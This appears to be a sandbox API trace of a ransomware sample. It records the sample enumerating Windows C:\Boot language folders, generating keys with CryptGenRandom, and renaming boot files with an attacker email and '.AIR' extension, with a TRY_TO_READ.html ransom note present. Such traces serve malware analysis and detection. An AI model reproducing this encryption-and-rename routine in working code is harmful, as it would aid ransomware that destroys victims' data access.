	[0051.989] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5965d0
	[0051.989] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b3438 | out: pbBuffer=0x5b3438) returned 1
	[0051.989] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5965d0 | out: pbBuffer=0x5965d0) returned 1
	[0051.989] SetFileAttributesW (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui", dwFileAttributes=0x80) returned 0
	[0051.990] lstrlenW (lpString="C:\\\\Boot\\en-US\\memtest.exe.mui") returned 30
	[0051.990] GetProcessHeap () returned 0x540000
	[0051.990] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0051.990] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\en-US\\memtest.exe.mui" | out: lpString1="C:\\\\Boot\\en-US\\memtest.exe.mui") returned="C:\\\\Boot\\en-US\\memtest.exe.mui"
	[0051.990] lstrcatW (in: lpString1="C:\\\\Boot\\en-US\\memtest.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\en-US\\memtest.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\en-US\\memtest.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.990] MoveFileExW (lpExistingFileName="C:\\\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\en-US\\memtest.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0051.990] CreateFileW (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0051.990] GetProcessHeap () returned 0x540000
	[0051.990] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0051.990] CloseHandle (hObject=0xffffffff) returned 0
	[0051.990] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.990] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.990] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.990] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b3540
	[0051.990] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5965e0
	[0051.990] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b3540 | out: pbBuffer=0x5b3540) returned 1
	[0051.990] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5965e0 | out: pbBuffer=0x5965e0) returned 1
	[0051.990] SetFileAttributesW (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0051.990] lstrlenW (lpString="C:\\\\Boot\\en-US\\bootmgr.exe.mui") returned 30
	[0051.990] GetProcessHeap () returned 0x540000
	[0051.990] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0051.990] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\en-US\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\en-US\\bootmgr.exe.mui") returned="C:\\\\Boot\\en-US\\bootmgr.exe.mui"
	[0051.990] lstrcatW (in: lpString1="C:\\\\Boot\\en-US\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\en-US\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\en-US\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.990] MoveFileExW (lpExistingFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0051.991] CreateFileW (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0051.991] GetProcessHeap () returned 0x540000
	[0051.991] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0051.991] CloseHandle (hObject=0xffffffff) returned 0
	[0051.991] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.991] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.991] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.991] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.991] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5350 | out: hHeap=0x540000) returned 1
	[0051.991] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5378 | out: hHeap=0x540000) returned 1
	[0051.991] FindFirstFileW (in: lpFileName="C:\\\\Boot\\es-ES\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5752a0
	[0051.991] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.991] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.991] GetLastError () returned 0x6
	[0051.991] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.991] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.991] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.991] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5350
	[0051.991] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5752e0
	[0051.991] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5752e0 | out: hHeap=0x540000) returned 1
	[0051.991] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.991] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.991] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5350 | out: hHeap=0x540000) returned 1
	[0051.991] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.991] FindNextFileW (in: hFindFile=0x5752a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0051.992] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.992] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.992] GetLastError () returned 0x6
	[0051.992] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.992] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.992] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.992] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5350
	[0051.992] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5752e0
	[0051.992] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5752e0 | out: hHeap=0x540000) returned 1
	[0051.992] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.992] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.992] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5350 | out: hHeap=0x540000) returned 1
	[0051.992] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.992] FindNextFileW (in: hFindFile=0x5752a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0051.992] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.992] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.992] GetLastError () returned 0x6
	[0051.992] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5350
	[0051.992] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.992] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.992] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.992] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.992] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5350 | out: hHeap=0x540000) returned 1
	[0051.992] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.992] FindNextFileW (in: hFindFile=0x5752a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c64330, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0051.992] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.992] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.992] GetLastError () returned 0x6
	[0051.992] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.992] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0051.992] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.992] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.992] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0051.992] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.992] FindNextFileW (in: hFindFile=0x5752a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c64330, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0051.993] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.993] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b4650
	[0051.993] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5965f0
	[0051.993] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b4650 | out: pbBuffer=0x5b4650) returned 1
	[0051.993] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5965f0 | out: pbBuffer=0x5965f0) returned 1
	[0051.993] SetFileAttributesW (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0051.993] lstrlenW (lpString="C:\\\\Boot\\es-ES\\bootmgr.exe.mui") returned 30
	[0051.993] GetProcessHeap () returned 0x540000
	[0051.993] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0051.993] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\es-ES\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\es-ES\\bootmgr.exe.mui") returned="C:\\\\Boot\\es-ES\\bootmgr.exe.mui"
	[0051.993] lstrcatW (in: lpString1="C:\\\\Boot\\es-ES\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.993] MoveFileExW (lpExistingFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0051.993] CreateFileW (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0051.993] GetProcessHeap () returned 0x540000
	[0051.993] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0051.993] CloseHandle (hObject=0xffffffff) returned 0
	[0051.993] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.993] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.993] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.993] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.993] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a53a0 | out: hHeap=0x540000) returned 1
	[0051.993] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a53c8 | out: hHeap=0x540000) returned 1
	[0051.993] FindFirstFileW (in: lpFileName="C:\\\\Boot\\fi-FI\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5752e0
	[0051.994] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.994] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.994] GetLastError () returned 0x6
	[0051.994] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.994] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.994] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.994] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a53a0
	[0051.994] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575320
	[0051.994] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575320 | out: hHeap=0x540000) returned 1
	[0051.994] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.994] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.994] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a53a0 | out: hHeap=0x540000) returned 1
	[0051.994] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.994] FindNextFileW (in: hFindFile=0x5752e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0051.994] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.994] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.994] GetLastError () returned 0x6
	[0051.994] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.994] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.994] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.994] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a53a0
	[0051.994] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575320
	[0051.994] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575320 | out: hHeap=0x540000) returned 1
	[0051.994] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.994] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.994] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a53a0 | out: hHeap=0x540000) returned 1
	[0051.994] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.994] FindNextFileW (in: hFindFile=0x5752e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0051.994] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.994] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.995] GetLastError () returned 0x6
	[0051.995] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a53a0
	[0051.995] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.995] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.995] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.995] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.995] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a53a0 | out: hHeap=0x540000) returned 1
	[0051.995] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.995] FindNextFileW (in: hFindFile=0x5752e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c64330, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0051.995] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.995] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.995] GetLastError () returned 0x6
	[0051.995] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.995] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0051.995] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.995] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.995] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0051.995] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.995] FindNextFileW (in: hFindFile=0x5752e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c64330, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0051.995] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.995] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b5760
	[0051.995] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596600
	[0051.995] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b5760 | out: pbBuffer=0x5b5760) returned 1
	[0051.995] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596600 | out: pbBuffer=0x596600) returned 1
	[0051.995] SetFileAttributesW (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0051.995] lstrlenW (lpString="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui") returned 30
	[0051.995] GetProcessHeap () returned 0x540000
	[0051.995] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0051.995] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui") returned="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui"
	[0051.995] lstrcatW (in: lpString1="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.995] MoveFileExW (lpExistingFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0051.996] CreateFileW (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0051.996] GetProcessHeap () returned 0x540000
	[0051.996] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0051.996] CloseHandle (hObject=0xffffffff) returned 0
	[0051.996] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.996] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.996] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.996] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
